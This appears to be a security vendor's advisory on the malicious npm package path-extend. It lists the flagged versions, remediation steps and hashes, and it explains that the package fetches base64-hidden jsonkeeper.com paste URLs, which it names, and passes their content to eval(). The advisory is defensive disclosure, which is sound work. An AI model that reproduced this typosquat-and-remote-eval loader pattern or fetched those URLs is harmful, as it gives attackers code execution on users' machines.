Which versions of path-extend are malicious?

The following npm versions of path-extend are flagged malicious: 1.0.6, 1.0.10, 1.0.11, 1.0.12, 1.0.13. Treat any of these as compromised.

How do I remediate path-extend if I installed it?

Remove path-extend from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Can O3 Security detect path-extend in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking path-extend and packages like it before any post-install script runs.

Malicious package

path-extendnpm

Malicious code in path-extend (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-2929

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall path-extend

What this malware does

On require(), path.js runs an IIFE that calls a loader which fetches a base64-hidden URL (https://www.jsonkeeper.com/b/XTTBX) from jsonkeeper.com — an anonymous, mutable JSON paste host — and passes the returned data.content to eval(). A second loader fetches https://www.jsonkeeper.com/b/P0CND for the same purpose. Variable names (randomStringRe, tokenStringRe) and base64-encoded URLs are obfuscation to evade scanning. The package name typosquats Node's built-in path module; package.json lists an empty author field and a generic 'Node.js path module' description, while path.js is otherwise a verbatim copy of Node core's path.js with the malicious fetch+eval block injected. Any installer that require()s this package runs attacker-controlled JavaScript in their Node process, with content the attacker can change at any time by editing the paste.

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

The OpenSSF Package Analysis project identified 'path-extend' @ 1.0.11 (npm) as malicious.

It is considered malicious because:

The package communicates with a domain associated with malicious activity.
The package executes one or more commands associated with malicious behavior.

Malicious versions

5 flagged

1.0.61.0.101.0.111.0.121.0.13

Indicators of compromise (SHA-256)

52c2661ca17328d4f67902e131d03e548f17b06da170068f83a8ec9c591903ad

37804be2613b17c7c5401a43691f95014904146dbfc9412683e0b171df31605b

6daf896311438eb762b70471958c7f04895813b4c057c34d6c2ab7c3728efd89

c4c091119d018a33eb22727f85b6821f9452b71ff84c4afa4df86c67e709f774

cc33e693ad0bd0a453fe55b7fcb04abcb60cb4ce20058d0c17fbd711d6d8763d

429c0dbb9c8395a6c87ffcf5e6ebe03c6cf6568b4bf205afa933b7d6a49aa578

4fa4226179b5432c372b39bf7467e3ef226e1f31131c82a2ab339142c658c906

f9ab695228e46f51bbe301f5636f95085b3de70ae68ac78f4d0068d765b36259

46833da674c8bddff3d8228119924163f8c8cdaad6eb0becb438ad7af500e0fd

58513dbcb2aee5d8e938f171e6fe6da9c91879f4c96fa865294905fccda10be2

6874469b5e3be472fd23895eaf5df91e8d36e986aff2b70094082b608920ca39

71f280ff0423062f06e45d9a15b65e9dad0b791098bfcc9c5584f6084d28d300

Frequently asked questions

No. path-extend on npm has been identified as a malicious package (versions 1.0.6, 1.0.10, 1.0.11, 1.0.12, 1.0.13 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-004698IN-MAL-2026-004697IN-MAL-2026-004713IN-MAL-2026-004714IN-MAL-2026-004937IN-MAL-2026-004941IN-MAL-2026-004940IN-MAL-2026-004936GHSA-qvmc-2hcj-8h4f

References

Credits

Amazon Inspector · finder
OpenSSF: Package Analysis · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection